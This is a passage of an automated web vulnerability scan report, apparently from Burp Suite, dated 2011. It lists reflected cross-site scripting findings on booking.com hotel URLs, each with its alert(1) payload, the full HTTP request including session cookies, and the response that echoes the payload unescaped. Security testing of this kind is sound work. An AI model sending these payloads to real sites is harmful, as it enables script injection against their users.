ZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:31 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zItu4AAlIbZ%2FiwZpe9eGHHXUJ1BpWiiCjSDsmLHxu4ZfqctRRH6OhvatAkHnz%2F5LYttoEBM6CLX0GciN6Rk679m2WVeATkk00PpkQBb978QBaKP8d9x8bcVZBaEvTgXPykG%2F5ulg0dhDMIJrFZ%2BA7LVaUh%2F%2F8JIZp0jP455hs%2FKN2BcBYlOEQPGB3wjSIJMxeyGXukprBnChj9BQTDFPocSZY1ZPDZJwwgMz9CchsLYRanHYnlrP3mcUmoWNbB1vVgwKGTbSQ8Q2FmaLNFqzxCxYKUQHovVPYO93Uy4vZUpH8dlh5ChpkOO4grRqL%2BC%2FnBjswCnn8uITaR6FxTobzUuFfam3zz7%2BhIMVxl1DHkGzbHpAnNLx%2B74Di8weWeC2vnlqT6V1dM36RWt0d1t8BDm0molUuqlbGI0Bzg2JbvsqBhEkdq9qi%2FbabJpWiZCtfwoXNC4YttZwGrz9w5uoSvTe8LpLLcqSAJ4E9pkux747Cg%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:31 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232453
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554638b3'-alert(1)-'dc24a3dc444';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking.env.b_southwest_lon
...[SNIP]...
4.194. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57fab'%3balert(1)//5fbdabc63bf was submitted in the REST URL parameter 1. This input was echoed as 57fab';alert(1)//5fbdabc63bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel57fab'%3balert(1)//5fbdabc63bf/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:15 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55874
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ooking.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel57fab';alert(1)//5fbdabc63bf/us/copley-square.en.html';
booking.env.b_canonical_url_delimiter = '?';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


book
...[SNIP]...
4.195. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf755"><script>alert(1)</script>61a65b853c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotelcf755"><script>alert(1)</script>61a65b853c8/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:08 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55958
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotelcf755"><script>alert(1)</script>61a65b853c8/us/copley-square.html" />
...[SNIP]...
4.196. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259d8"><script>alert(1)</script>99180b375ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us259d8"><script>alert(1)</script>99180b375ff/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:22 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55934
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotel/us259d8"><script>alert(1)</script>99180b375ff/copley-square.html" />
...[SNIP]...
4.197. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 109f6'%3balert(1)//510718ca3c6 was submitted in the REST URL parameter 2. This input was echoed as 109f6';alert(1)//510718ca3c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us109f6'%3balert(1)//510718ca3c6/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:31 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55859
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ing.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us109f6';alert(1)//510718ca3c6/copley-square.en.html';
booking.env.b_canonical_url_delimiter = '?';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking
...[SNIP]...
4.198. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c246"><script>alert(1)</script>ca9d29b05b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/copley-square.en-us.html6c246"><script>alert(1)</script>ca9d29b05b0?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sug